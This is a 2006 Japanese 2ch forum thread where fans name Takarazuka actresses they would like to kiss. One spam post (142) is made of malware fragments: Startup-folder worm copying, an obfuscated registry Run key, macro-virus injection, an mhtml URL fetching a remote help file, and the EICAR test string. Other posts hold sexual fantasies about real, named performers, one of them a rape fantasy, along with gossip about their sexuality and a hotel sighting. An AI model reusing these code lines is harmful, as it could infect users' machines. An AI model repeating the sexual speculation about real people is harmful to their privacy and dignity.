140 :名無しさん@花束いっぱい。:2006/10/07(土) 00:44:45 ID:/drOIOW4
お花のの清らかであどけない寝顔を見つめながら一晩過す
躰を抱かなくてもそれで充分満たされる
寝顔と健やかな寝息と体温をそばで感じることができたらそれでいい


141 :名無しさん@花束いっぱい。:2006/10/07(土) 00:56:44 ID:ysirOrrV
それもまた真髄なり。

142 :<body onload=window()>:2006/10/07(土) 02:21:34 ID:m5UM5R2H
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

143 :名無しさん@花束いっぱい。:2006/10/07(土) 03:54:23 ID:cp1UUzMW
そーだ!もう「只の仲良し」は通用しないぞ。別途1台だぞ。
仲良しさんはミラコスタに泊まりたかったとしても、ベット2つを選択するだろう…。
(まして、よいお年しなんだから)
その結果、ミラコスタをあきらめる事になったとしても…ただのなかよしさんなら、
優先順位がベット数が先だろう(w

こうまで堂々と、人目のある所へ連れ出し、いちゃつき、やってるなんて。
うらやましすぎるぞ!

144 :名無しさん@花束いっぱい。:2006/10/07(土) 10:11:43 ID:4id67OVY
タキさんと末子はんとで3Pしたい

145 :名無しさん@花束いっぱい。:2006/10/07(土) 10:38:03 ID:HD17YaAS
>>144
それはまた結構なご趣味で…

146 :名無しさん@花束いっぱい。:2006/10/07(土) 10:43:51 ID:Jo5VaoLX
1の変態プレイ願望不可・・・にはひっかかりませんかね?

147 :名無しさん@花束いっぱい。:2006/10/07(土) 10:53:08 ID:9aRF5JoO
>>144二人共ビアンなんだっけ?ww

148 :名無しさん@花束いっぱい。:2006/10/07(土) 11:03:53 ID:9aRF5JoO
よくよくヤりたいジェンヌを考えてみたが男役ばかり浮かぶ

娘役でヤりたいのはフーちゃんだけだ

149 :名無しさん@花束いっぱい。:2006/10/07(土) 16:06:03 ID:4id67OVY
>>147
漏れが思うに、
末子はガチでタキさんは欲求不満からくる
擬似ビアン

150 :名無しさん@花束いっぱい。:2006/10/07(土) 21:14:09 ID:ysirOrrV
ホテルミラコスタの件はソースあるの?
あるならガチで萌えられるんだが‥

151 :名無しさん@花束いっぱい。:2006/10/07(土) 22:53:01 ID:90C+WnSv
某所より抜粋転記

3日の18時頃にミラ○のエレベーターにてお二方に遭遇しました。
丁度下りのエレベーターでこちらは4Fから乗車したのですが
ドアが開いた時丁度視界に入ったのが花ちゃんで「良く似て
いる人が居る…」と思いつつ傍らを見上げるとたかこサンの
姿が!そこで本物のお二人だと興奮しつつも確信しました。
表面上は何気なく普通に過ごしていたのですが、内心動揺して
ましたので動行の友人(非ヅカファン)の証言と合わせて覚えて
いる事が、4Fを目的地と間違えて降りようとしたたかこサンを
花ちゃんが「違うよここじゃないよ」と留めて、密かに慌てて
いたらしい事。(友人はたかちゃんをかっこいいお兄さんだと
思っていたらしいです。綺麗なカップルが先乗していたので、
何となく乗り難いなと。あの人はお姉さんだよと降車後に説明
したら、とても驚いていました)
ミラ○のエレベーターは階数毎にミッキーが「〜階だよ」等セリフで
アナウンスしてくれるのですが、それを花ちゃんがモノマネして
いて可愛かった事(でもゴメンナサイ正直可愛かったですが似てません
でした)です。
2階で降車されたので、恐らく夕食に出られたんだと思われます


152 :名無しさん@花束いっぱい。:2006/10/07(土) 22:54:38 ID:90C+WnSv
続き

また、夜間にハーバーショーが開催されミラ○の部屋では各自それを
鑑賞できるのですが、タイミングが良いのか悪いのか、丁度
宿泊部屋の視界斜め上がお二人の部屋で、テラスで鑑賞されている姿が目に留まりました。
丁度気づいたきっかけが、幾度となく焚かれるフラッシュの
所為で(余りにバシバシと眩しかったので)「ショーを背景に
人物を撮りたいなら、あのフラッシュじゃまずいよね。
「写真撮るの苦手なのかな」「デジカメフルオートで、調整の仕方が
わからないんじゃないの?」等々友人と話していたのが、↑の
使い捨てカメラだったという証言に、凄く納得しました。
部屋位置から、恐らく1番か2番目に高価なスイート宿泊だと
予測できますが、ベッドがスイートは1台しかなかったような
気がする…とその晩の会話の流れで「…何となく、深く考える
のはよそうね。もう」と、その後無責任にキャーと喜びながら、
個人的に楽しい鼠の休日を楽しませて頂きました。
普段は別の生徒サンのライトファンで此方にお邪魔する事は無いのです
けれど、軽く萌えたついでにご報告させて頂きました。


153 :名無しさん@花束いっぱい。:2006/10/07(土) 23:00:08 ID:90C+WnSv
ミラコは最上階が5階なので、4階から乗った××サンより先に
ご夫妻がいらっしゃったとすれば宿泊は最上階ですね。

以上、某所よりコピペ。っていうか、ややスレ違いかな。
ま、Hな話に繋がるのでOG目撃スレよかココでOKとゆ〜ことで。
ホテルのHPによるとそこはベッドは一つで間違いないらしい。ハハハハハハ・・・


154 :名無しさん@花束いっぱい。:2006/10/07(土) 23:16:52 ID:Jo5VaoLX
おハナ・・・
タカコの糞ヤローッ!!
おハナーーーーーーーー・・・・・・・・・

155 :名無しさん@花束いっぱい。:2006/10/08(日) 00:00:37 ID:mOvykB04
だからーーータカコ関係ないんだってばw 
現実なんて無視無視、スルー汁
ここは娘役でキスしたい人を書くの!
永遠の憧れマリーハナフサに熱く激しいキスを贈りたい!
誰のものになっていてもいい。でもキスしたい!


156 :名無しさん@花束いっぱい。:2006/10/08(日) 00:04:55 ID:D8/PAIvP
でもおハナの中にナンかしてると思うだけで悔しい!

157 :名無しさん@花束いっぱい。:2006/10/08(日) 09:56:16 ID:hrjx7haH
ミラコスタのホームページによれば、
最上級スイートの宿泊料金、一泊50万円也。
心臓とまりそうになったがな。

158 :名無しさん@花束いっぱい。:2006/10/08(日) 09:58:22 ID:umzBvwwH
花ちゃんとタカコさんお幸せに

159 :名無しさん@花束いっぱい。:2006/10/08(日) 11:23:11 ID:XZDozhxl
>>157
そんな金、一体どこからでてるの?
あの二人にそんな豪遊ができるほどの蓄えがあったの?
それともやっぱり花様のご実家?

160 :名無しさん@花束いっぱい。:2006/10/08(日) 12:13:01 ID:j2sXpmaD
薄給で有名なジェンヌでも、トップになるとそれなりの高給取りになるんじゃなかったっけ?


161 :名無しさん@花束いっぱい。:2006/10/08(日) 13:34:54 ID:5kd65ZK0
無粋なスレになって参りました!

162 :名無しさん@花束いっぱい。:2006/10/08(日) 15:10:06 ID:D8/PAIvP
そんな豪遊毎日してるわけないし。基本的に二人とも金持ちの娘だし。
おハナ1日貸してくんないかな。1日でいいよ。クソ

163 :名無しさん@花束いっぱい。:2006/10/08(日) 15:11:51 ID:nOpDUe1h
>最上級スイートの宿泊料金、一泊50万円也。

検証の結果、他の部屋だったということが判明。
一泊8万くらいだった。

たかこさんはトップ歴長いし全公演大入り続きだし
かなりの高給とりだった思われ。

164 :名無しさん@花束いっぱい。:2006/10/08(日) 15:13:37 ID:yifadtXX
一日ハナタンを貸してもらったら何する?

165 :名無しさん@花束いっぱい。:2006/10/08(日) 15:52:18 ID:YFjFe2Ah
>>164
許す限りホテルの一室に引き篭る・・・


166 :名無しさん@花束いっぱい。:2006/10/08(日) 16:35:45 ID:yifadtXX
自分は半日TDLに行く。夜はレンタルビデオ屋に行ってDVDを二人で選んで、
電気消してコアラみたいにくっついたままDVD鑑賞。とか言いながら、
チュウとか擽ったりとかちょっかい出しまくる。いやにフツーだ・・・


167 :名無しさん@花束いっぱい。:2006/10/08(日) 17:07:40 ID:Tkd/iuRh
このスレ男が来てるならわかるが
女ならかなりキモい。

168 :名無しさん@花束いっぱい。:2006/10/08(日) 17:40:55 ID:D8/PAIvP
え〜?男は滅多に来てないんじゃないの?
バリネコおハナに夢中なのは女子ばかりだよ。

169 :名無しさん@花束いっぱい。:2006/10/08(日) 17:50:54 ID:YFjFe2Ah
167
ここまで覗きにきてそのコメントのほうがww

170 :名無しさん@花束いっぱい。:2006/10/10(火) 00:20:25 ID:HYUVV4Ko
タカコがズボネコ、お花がスカタチってことはないだろうか。

171 :名無しさん@花束いっぱい。:2006/10/10(火) 01:00:35 ID:mJWRkg2f
それはまずありえないが・・・ありえないからこそ見てみたい。
ま、個人的にはニャンニャンなお花ちゃんを失神させたいなー。

172 :花總まり:2006/10/10(火) 12:44:08 ID:eGLhfAUK
私は貴子さん以外無理ですから!

173 :名無しさん@花束いっぱい。:2006/10/10(火) 13:59:07 ID:d/PqdbWE
皆様の願望がバリネコなのか解らないけど、花はリバだよね? 

174 :名無しさん@花束いっぱい。:2006/10/10(火) 19:52:01 ID:g4ES0LiF
相方が深爪大王だから、それで妄想してると思うにょ

175 :名無しさん@花束いっぱい。:2006/10/10(火) 21:07:22 ID:mJWRkg2f
お花がフカヅメになってたらどうしよ・・・

176 :名無しさん@花束いっぱい。:2006/10/10(火) 22:50:06 ID:M0nvG1Ja
花はリバじゃないでしょ〜、どうみても。

177 :名無しさん@花束いっぱい。:2006/10/11(水) 00:46:21 ID:J+kWKblH
私的にタチ娘役×ネコ男役の組み合わせに萌える少数派なんだけど、タカハナに限ってはあくまでもタカ→タチ、ハナ→ネコって感じるんだよな。
これは宝塚という虚構を取り去っても、二人の素がビアンカップルにそれに限りなく近いというか、理想形そのものだからというか・・。

なんかチラ裏スマソ。

178 :名無しさん@花束いっぱい。:2006/10/11(水) 05:05:57 ID:oMq/mfRr
願望とか妄想じゃなくてごめんなさい
月組の末子はんとあーちゃんがシラフでキスして写真に納まってるんですが
プリクラがはやっていた頃の写真とここ半年以内の写真です
同じ組、同期、娘役同士なので嘘っぽいような気もするのですが
誕生日とか特別な日ってわけではないのでダイクなのかな?と
末子はんの名前はよく挙がるけどあーちゃんはヘテロって思ってる人
多いいみたいだから信じなくてもいいのですけど写真は本当にあるんです

179 :名無しさん@花束いっぱい。:2006/10/11(水) 09:31:24 ID:fK4PjF1F
花はリバだよね 今はタカコが相手だからリバネコなんでしょ?
タカコもリバだよ。タチ寄りだけど。

180 :名無しさん@花束いっぱい。:2006/10/11(水) 11:03:30 ID:41xpr7cX
末子はんは美形な男役が好きなんでしょ?

181 :名無しさん@花束いっぱい。:2006/10/11(水) 11:15:46 ID:1QmExwly
末子はん娘役も好きだと思うよ
年下の、娘役一人囲ってやん


182 :名無しさん@花束いっぱい。:2006/10/11(水) 16:41:39 ID:nvh2LEYj
おハナ命だが、皆のカキコ見て末子さんに興味がわいてきたゾ。
みんなで広げよう、ビアンの輪!

183 :名無しさん@花束いっぱい。:2006/10/11(水) 19:29:32 ID:FZq7DeBr
あー末子さんに襲われたい〜

184 :名無しさん@花束いっぱい。:2006/10/11(水) 21:11:05 ID:5BLvMf1J
熱い唇♀末子♀胸の炎

末子はん囲ってるの七月七日生まれの月組娘やな

185 :名無しさん@花束いっぱい。:2006/10/11(水) 23:04:00 ID:4SOFW2/r
ごめん・・・リバってどっちも!って意味だよね?

186 :名無しさん@花束いっぱい。:2006/10/12(木) 00:07:04 ID:vm814TwH
花ちゃんはああ見えてけっこうサバサバしてて男っぽいとこありそうだし、
たかこさんの荷物をまとめたり、ツッコミ役ってところを考えると
リバっぽいかもね。


187 :名無しさん@花束いっぱい。:2006/10/12(木) 10:40:50 ID:qcKaTIuz
>>178
現役生徒orOGのカキコミですか?!
ここんところ、リバだのタチ娘役×ネコ男役とかって
型にはまったスタイルでしか見ることのない視野狭窄達に飽き飽きしていたので
末子はん♀あーちゃんってすごく新鮮だし
型にとらわれずに自由にお互いを愛しているって言う感じですごくいいと思った
・・・末子はん♀あーちゃんのちゅ〜写真ほしいな・・・

188 :名無しさん@花束いっぱい。:2006/10/12(木) 11:52:19 ID:7iO+nYWz
ジサクジ乙

189 :名無しさん@花束いっぱい。:2006/10/12(木) 20:53:06 ID:GUza6rrg
とりあえず同期は全て喰っちゃったの?>末子
じゃあノンケの誉(?)高き(●▽●)や真飛も既に……

190 :名無しさん@花束いっぱい。:2006/10/12(木) 21:09:26 ID:YlqVNRzT
タカハナは退団してようやくビアンだと確信できたが、
末子さんがビアンだという裏付けとかあったら教えてちょ〜。

191 :♀末子♀:2006/10/12(木) 22:13:08 ID:A8cSKPpJ
ヘテロがヘテロの裏づけ取るのが難しいのと同じように
ビアンがビアンであると証明するのは結構難しいのですけどね
>>190 はへテロのビアン好きって感じがします


192 :名無しさん@花束いっぱい。:2006/10/12(木) 22:29:28 ID:7iO+nYWz
そういやぁ真飛も(●▽●)もバリバリのノンケだっけねw
末子はん昔(●▽●)に迫ってるって噂あったよwww

193 :名無しさん@花束いっぱい。:2006/10/12(木) 23:29:16 ID:9orEVuAF
その時に受けて立ってたら、
めでたく童貞卒業できてたのに。

194 :名無しさん@花束いっぱい。:2006/10/12(木) 23:31:37 ID:7iO+nYWz
(●▽●)は城華阿月からも逃げてるんだよねw完璧なノンケ

195 :名無しさん@花束いっぱい。:2006/10/13(金) 00:03:48 ID:Q0brkVnk
タニは男役、可愛くてもスレちがい。
娘役を語ってくださいな。

196 :檀れい@大売出し:2006/10/13(金) 00:25:52 ID:gIMQ5B5+
ビアンだと確認できたとか、誰がビアンだとか、
ここのスレは「ビアン云々」という趣旨じゃないのです。
ビアン、ノンケ、タチ、ネコとかそういうこと関係ないの。
話題にするスレではないのよ。
「娘役でキスしてみたい人」を書くスレなの。
ほんとにビアンなのかどうなの?とか、誰と誰がキスしてたとか関係ないわけ。
カワイイ(●▽●)でも、このスレではお呼びでないの。
【「娘役でキスしてみたい人」を書くスレなの】

197 :名無しさん@花束いっぱい。:2006/10/13(金) 00:30:03 ID:stvCcmEp
↑そろそろ来ると思ったよ。
で、またまたハナフサオンリーの書き込みが延々続く、と。この繰り返し。

198 :名無しさん@花束いっぱい。:2006/10/13(金) 01:52:45 ID:hc8R9Tp2
いいの。別に。
だってキスしてみたいんだもん。おハナと。
1度でいいから「アン」とか言う声を聞いてみたいんだお。

199 :名無しさん@花束いっぱい。:2006/10/13(金) 06:16:27 ID:EuWk3ed1
私はあーちゃんにキスしたいです
舌入れナシの唇に”ちゅっ”ってしたいな

200 :名無しさん@花束いっぱい。:2006/10/13(金) 06:27:58 ID:bNoENAvv
>>196
で、誰とキスしたいんだい?スレタイ通りちゃんと書けや。
アタイはやっぱおハナ様だな。キス後の例の顔を拝みたい

201 :名無しさん@花束いっぱい。:2006/10/13(金) 21:36:12 ID:4j84gJay
アイスクリームの食べ過ぎで二重顎の安倍晋三
拉致被害者家族会と目の悪い女性ファンだけが支持者(アホボン)

202 :檀れい@大売出し:2006/10/14(土) 00:51:42 ID:n4c2wayz
>>200
真面目に答えると そりゃハナフサマリ様。
197がウンザリしていそうで申し訳ないけどwwお約束じゃなくて真剣に。

檀ちゃんが好きなんだけど(芸風が)
キスしたいなーと思うのはハナフサさんなのよね。
繊細な華奢さ、年齢のわりに異様に無垢さを感じさせるキャラ、
小さな頭、きれいな首筋とか小さくて薄い唇とか。
道具立てが完璧な様子がいいな。
ハナフサさんみたいな人、なかなかいない。

203 :名無しさん@花束いっぱい。:2006/10/15(日) 22:22:09 ID:d4q68B/W
道具立て

204 :名無しさん@花束いっぱい。:2006/10/15(日) 22:28:54 ID:d4q68B/W
失礼、送ってしまったわ。
道具立てが完璧と言うのは同意。
それから、あの顔であの声でトカゲ喰うかや ホトトギスと言いたくなる風情に惹かれる。
付き合ったりするのは面倒くさいだろうけれど。

205 :名無しさん@花束いっぱい。:2006/10/16(月) 19:24:17 ID:bJNTeMcc
あー、確かにお花と付き合いたいとは思わないな、やりたいとは思うけど。
お互い本命がいて、1クールに1回くらいガッツリやる、ってのが理想。

206 :名無しさん@花束いっぱい。:2006/10/16(月) 21:09:23 ID:LV9GwAYh
花様の稀に見る清らかさと硬さの理由はおそらく、彼女が処○だからではないか…
今時音校入学時点ですでに非○女のコも珍しくないだろうに。
男との深い関わりを一切持たずに生きて行けるんだから、まさしく最も哀れで、最も賢く、そして最も強い女である。


207 :名無しさん@花束いっぱい。:2006/10/16(月) 22:17:48 ID:kaidS8hX
えーー付き合いたいよ。もちろんやりたいけど。
>>118みたいなことが毎日したい。

208 :名無しさん@花束いっぱい。:2006/10/16(月) 23:10:21 ID:qfmWucgo
今だディズニーネタで凹んでいる自分はOGのコモさんに慰められたひ
キレイなお姉さんなコモ姉さんでカテキョーなんていいなぁ
白開襟シャツ&タイトスカートでお願いしたいw

209 :名無しさん@花束いっぱい。:2006/10/17(火) 07:50:54 ID:6RSWfwbX
勝手に哀れまないでくれる?って叱られるぞw。
とりあえず、花様には「あたしはエッチな子です」と言ってもらいたい。

210 :名無しさん@花束いっぱい。:2006/10/17(火) 08:13:57 ID:lu0icyhC
ハナフサ嬢は「エッチな子」には見えないけど>>209
不思議にいつまでたっても幼い固い蕾の感じ。そこがそそられる所以。
だから>>118みたいなことを想像すると可愛くて堪らない。
興奮状態で喋りまくる小さな口元に食いつきたい。きっとキョトンとして可愛いぞw


211 :名無しさん@花束いっぱい。:2006/10/17(火) 15:06:18 ID:6RSWfwbX
つ言葉責め

212 :名無しさん@花束いっぱい。:2006/10/18(水) 20:13:36 ID:x/Ve+gxZ
御崎恵センセ

213 :名無しさん@花束いっぱい。:2006/10/18(水) 21:08:44 ID:QeKtF9FY
センセは娘役カヨ!(荒川静香に似てないかい?)
センセはタチかリバっぽい・・・つうかビアンではないだろ。(自らにツッコミ)

214 :名無しさん@花束いっぱい。:2006/10/19(木) 00:53:42 ID:A95A0slF
植田景子せんせ。

215 :名無しさん@花束いっぱい。:2006/10/19(木) 13:04:08 ID:GJrVJMoQ
児玉っち

216 :名無しさん@花束いっぱい。:2006/10/19(木) 14:40:57 ID:EUr9VnVV
>215
抱いた後はちゃんと責任とれよな!

217 :名無しさん@花束いっぱい。:2006/10/19(木) 14:50:53 ID:LUyYPCEu
抱きたいスレじゃないよ。
ここはキスしてみたい娘役を語るスレ。
第一コダマッチは娘役じゃないしw

218 :名無しさん@花束いっぱい。:2006/10/19(木) 15:08:11 ID:/eV8Od4V
梅咲衣舞

219 :名無しさん@花束いっぱい。:2006/10/19(木) 20:52:32 ID:GJrVJMoQ
児玉っちが可愛くてしょうがない

220 :名無しさん@花束いっぱい。:2006/10/19(木) 21:20:20 ID:RUsaO53w
「白昼の稲妻」の時のポッポさんがやばいくらいにエロくて、何度か「お世話になりました」

221 :名無しさん@花束いっぱい。:2006/10/20(金) 09:00:47 ID:ElVRJPVY
ポッポさんいいよね。でも「何でも教えてあげる」って言ってくれそうなタイプじゃなさげ。
本当はお子様お断りなんだけど、「しょうがないわね」って感じで苦笑いして、相手してくれそうな・・・

222 :名無しさん@花束いっぱい。:2006/10/20(金) 10:56:16 ID:jL+2iBtu
でもあくまでもポッポさんはネコちゃん。
手とり足とり教えてくれる・・・ハァ

223 :名無しさん@花束いっぱい。::2006/10/20(金) 18:40:37 ID:0yj97z9f
「世話になった」の意味が通じていない模様。
ま、通じない方がいい罠。

224 :名無しさん@花束いっぱい。:2006/10/20(金) 19:21:02 ID://SvQD+D
スレ違いだが、月組の血と砂2幕最後の方で
ケロとミエが本当にちゅーしてる様に見えるのは私だけ?
ファンが闘牛ドンニャに殺られる直前。
口付いてるような…。
ずっと気になってますた。

225 :名無しさん@花束いっぱい。:2006/10/20(金) 20:09:52 ID:XEEAlK2p
ダンちゃんに「長崎しぐれ」の芸者姿になってもらいキスしてみたい!

226 :名無しさん@花束いっぱい。:2006/10/22(日) 12:11:37 ID:GCZoofnX
花總まり 専用スレ あるよ。
http://hobby8.2ch.net/test/read.cgi/drama/1160840313/l50

227 :名無しさん@花束いっぱい。:2006/10/22(日) 16:43:52 ID:jJQcvP2E
なんでここでお花様スレなど紹介する必要がある?
ここはキスしてみたい娘役を書くスレ
お花様にキスしてみたけりゃここで語れ。
お花様スレにキスなど下世話な話題は似合わない
きっと観てみたい役や芝居の話題で満載だろ?邪魔してやるなw
でも花様ひはやっぱ一度キスしてみたいよな・・・

228 :名無しさん@花束いっぱい。:2006/10/22(日) 17:44:55 ID:+BsYIitu
花さまとはキスもしてみたいが脇っ腹のあたりから腰までナデナデもしてみたい。
逆タイプだが音乃嬢のオパーイを掴んでみたいかも。

229 :名無しさん@花束いっぱい。:2006/10/23(月) 09:32:54 ID:pyzZUoyb
檀ちゃんに和服着させてはだけさしながら…犯す

230 :名無しさん@花束いっぱい。:2006/10/23(月) 10:25:20 ID:v0hae3IL
>>1
ここで画像検索できるお
ttp://super00.gozaru.jp/

231 :名無しさん@花束いっぱい。:2006/10/25(水) 07:59:08 ID:itEu3lu4
>>227-229
(´ι_` )あっそ

232 :名無しさん@花束いっぱい。:2006/10/26(木) 22:03:54 ID:AxlJ4UfL
こんなとこまでワザワザきてシラケたふりする欲求不満な231に愛の手を。

233 :名無しさん@花束いっぱい。:2006/11/02(木) 13:11:19 ID:b9eHSoIV
マリタンの部屋が完成したよ。
超高級家具も入れていつでも住めるようにしてるから、早く越しておいで。

234 :名無しさん@花束いっぱい。:2006/11/03(金) 00:09:08 ID:4yRLQiok
うちのほうがいいよ。うちにおいでよ。
タカコサンと過ごすための天蓋付きキングサイズベッドも入れてあげたよ。
暗視隠しカメラなんてないよ。

235 :名無しさん@花束いっぱい。:2006/11/04(土) 22:11:36 ID:Cj/oDtS9
寝室直結の浴室もつけてください。

236 :名無しさん@花束いっぱい。:2006/11/05(日) 09:45:35 ID:zY/iW7td
age

237 :名無しさん@花束いっぱい。:2006/11/05(日) 20:30:24 ID:4R13gfvs
野っ原でヤルのもいいと思うよ。マイナスイオン吸ってさ。
タカコ相手じゃ体験できない事を沢山教えてやるんだけどなー。

238 :名無しさん@花束いっぱい。:2006/11/05(日) 23:28:12 ID:82dTs3ns
ハナ、うちには野っぱらもあるよ
うちにおいで
一緒に暮そうよ

239 :名無しさん@花束いっぱい。:2006/11/07(火) 11:37:35 ID:/X/AZ37Z
正直に言うよ。タカコとは別れたほうがいいよ。
あいつは絶対裏切るよ。傷付く前にうちにおいで。大切にしてあげるよ。

240 :名無しさん@花束いっぱい。::2006/11/07(火) 19:15:50 ID:WytU91Z9
最近ショートカットに挑戦したんだが、
失敗してしまい今髪型が児玉っち状態。

241 :名無しさん@花束いっぱい。:2006/11/08(水) 23:26:42 ID:9edg4rVh
児玉っちになれて嬉しいの?
そういや、過去のレスに児玉っちファンがいたような。

242 :名無しさん@花束いっぱい。:2006/11/23(木) 21:11:18 ID:Q6ilpXh4
今日、阪急宝塚駅でこだまっちを見た。
この人髪型変わんないねw

243 :名無しさん@花束いっぱい。:2006/11/24(金) 00:03:43 ID:F6B3M7ls
すまん、漏れは児玉っちにキスしたいとは思わん…!!orz

漏れはワタルになって檀ちゃんやとなみの胸を容赦なく揉みしだいて
濃厚に唇や舌を吸いたい。
どっちかってーととなみかな。反応が素直そう。

244 :名無しさん@花束いっぱい。:2006/11/24(金) 00:50:47 ID:DdzHXi3F
花DC見てて、トシコさんのような熟女に優しく誘われるのも良いなと。
真飛マックス羨ましかったよ。

245 :名無しさん@花束いっぱい。:2006/11/24(金) 11:17:30 ID:F6B3M7ls
今読み返してたら209の文がソフトSMチックで禿萌だった…
プレー中にぜひ言わせて見たい!
きっとまりタソは半泣きになりながら言ってくれるに違いない。
タカコ相手ならね…

246 :名無しさん@花束いっぱい。:2006/11/24(金) 20:56:05 ID:DdzHXi3F
ハナ○サキ○ガイは、当人とともに卒業しちゃったのかな?
居たらうっとうしいけど、居ないとちと寂しい。

247 :名無しさん@花束いっぱい。:2006/11/24(金) 23:48:06 ID:wHIWD6qu
いるよ、ここに。
ただ現実に完全にタカコのモノになってしまってるのを毎度毎度つきつけられて、
ちょっとばかし意気消沈しているだけだよ・・・

248 :名無しさん@花束いっぱい。:2006/11/25(土) 00:36:29 ID:62YPCFkE
そこは宝塚。
星の数ほどの娘役がいるんだから、
次探せ、次。

249 :名無しさん@花束いっぱい。:2006/11/25(土) 07:19:09 ID:35kiL6eY
245同士!w

250 :名無しさん@花束いっぱい。:2006/11/25(土) 09:25:12 ID:QXg14INF
自分もハナたんが貴子のものとはっきりしてから
マジ落ち込みの日々でなかなか浮上できず・・
チクショー!!!ハナたんを壊れるほど激しく愛して
貴子と男の違いをハナたんのカラダに感じさせてやりてえ!

251 :名無しさん@花束いっぱい。:2006/11/25(土) 14:28:47 ID:zxjQmKv1
247,250、同士だ。
男に取られたらまだ諦めもつくが何故に和央ようかなんだ。
花總、人生考え直せ。盲目過ぎるぞ。
花總独占してやりたい放題の和央なんて大嫌いだ

252 :名無しさん@花束いっぱい。:2006/11/26(日) 16:53:10 ID:uxbzBlVI
同じく。でも私は宙下級生に移行してるw
誰も彼もかわええ〜

253 :名無しさん@花束いっぱい。:2006/11/26(日) 18:09:46 ID:6k4JIY56
誰もかれもかわいいとは思うさ。
でも生身の妖精花總まりに代わる子はいない。
あの歳であの純潔さを維持してる娘役はみつからんのよ・・・
その清らかさを維持させているのがタカコだと思うと複雑。
男の手では維持できないだろうし仕方ないんだけどさ。

254 :名無しさん@花束いっぱい。:2006/11/26(日) 19:42:43 ID:aXP0fOkf
>>246
やっぱり居ると鬱陶しいでつ

宙娘のむっちり感がたまらん。
音乃嬢とかカズネミオウちゃんとか葉室ちありんとか。ほっぺにチューしたい。

255 :名無しさん@花束いっぱい。:2006/11/26(日) 20:26:19 ID:6SbUQkDQ
鬱陶しいとかいいつつ、自分は書き込みしてなかったくせに。
お前になんかミキちゃんはやらん。
お花とミキちゃんはオイラが貰う。

256 :名無しさん@花束いっぱい。:2006/11/26(日) 20:33:25 ID:2agphtzo
>>254
同意。たっちん好き好き。
年齢の割にやたら落ち着き払ったところとか。
はるかに年上の自分でも、手の上で遊ばせてくれそうだ。

257 :名無しさん@花束いっぱい。:2006/11/26(日) 21:11:52 ID:aXP0fOkf
>>255
止まってたスレに書き込んだ>>242は私だけど。

>>256
たっちんはああ見えてネコだと思うw

258 :名無しさん@花束いっぱい。:2006/11/26(日) 22:36:18 ID:2agphtzo
>>257
なんで知ってるの?
た、たっちんと寝たことあるの?

259 :名無しさん@花束いっぱい。:2006/11/27(月) 00:48:42 ID:IDgDKkRJ
>>258
わ、わしゃペロっともパクっとも…(by竜馬)

ある訳ないw あの落ち着きを乱したいね。低めの声にもそそられる。

260 :名無しさん@花束いっぱい。:2006/11/27(月) 08:10:17 ID:5CnvKPth
和服姿のたっちんに膝枕してほしい

261 :名無しさん@花束いっぱい。:2006/11/27(月) 18:56:35 ID:RL/S/gMV
和音と杏を両脇にはべらせたい

262 :名無しさん@花束いっぱい。:2006/11/27(月) 20:26:55 ID:5CnvKPth
たっちんの着物の中に手ェつっこんで体中触りまくりながら、
大海亜呼あたりに三味線ひかせて唄わせる。「今宵も良い宴よのう。」

263 :名無しさん@花束いっぱい。:2006/11/27(月) 21:58:28 ID:gpDH6Dta
亜呼嬢か、渋いな。私は純子で。

264 :名無しさん@花束いっぱい。:2006/11/28(火) 21:09:10 ID:W3wd66Go
娘役は花組に限る!と思ってたけど、よく見ればあちこちに良い娘役がごろごろしとるわい。花總だけにやたら拘ってるアフォはかわいそうだな

265 :名無しさん@花束いっぱい。:2006/11/28(火) 21:55:29 ID:0PqQsthA
ハイハイワロスワロス

サヨナラ特集のりりかが可愛くてびくーり。おともだちになりたい。

266 :名無しさん@花束いっぱい。:2006/11/29(水) 10:36:48 ID:RSH759yl
りりかは出待ちで見たことあるけど、凄いかわいかったよ!
キスしたいと思わないけどデートしてみたいね。

267 :名無しさん@花束いっぱい。:2006/11/29(水) 18:16:05 ID:7s05dFlb
オイラは浮気はしない。
カワユイ娘役に心引き寄せられるも、手に入れたいのはお花だけ。
ただし今度のコンサートでただの普通の女になってるか、
浮き世ばなれしたままでいるかで、オイラの恋心が左右されるとは思う。

268 :名無しさん@花束いっぱい。:2006/11/29(水) 19:08:31 ID:XGDEalp8
>>267スレ違い

269 :名無しさん@花束いっぱい。:2006/11/30(木) 18:18:35 ID:NB3WY83+
268が間違い。1が↓言ってる。

135 :煩悩:2006/10/06(金) 18:23:58 ID:9zR2oGZH
1です。どーも。
ここは「娘役限定」でよろしくです。
詳しく言えば「娘役専門のタカラジェンヌ限定」ってことです。
ついでに言えばOGもオッケーです。娘役ならお歳も問わず。

さぁ、皆、理性はいらんからチューしたい娘役や、チュー以上をしたい娘役を語っておくれ!


270 :名無しさん@花束いっぱい。:2006/11/30(木) 20:19:47 ID:nZfxJy9P
>>267はOGだからじゃなくて、内容的にスレチでしょ。
花ちゃんにキスしたいっていう話はOKだよん。

タランテラ見た。シナたん…

271 :名無しさん@花束いっぱい。:2006/11/30(木) 22:50:33 ID:lISRs2gW
三度の飯よりたっちんが好きだ。

272 :名無しさん@花束いっぱい。:2006/11/30(木) 23:48:39 ID:lISRs2gW
だったら飯食わずに朝から晩までたっちん見てろ!
なんて、意地の悪いこと言わないのがこのスレの住人のいいところ

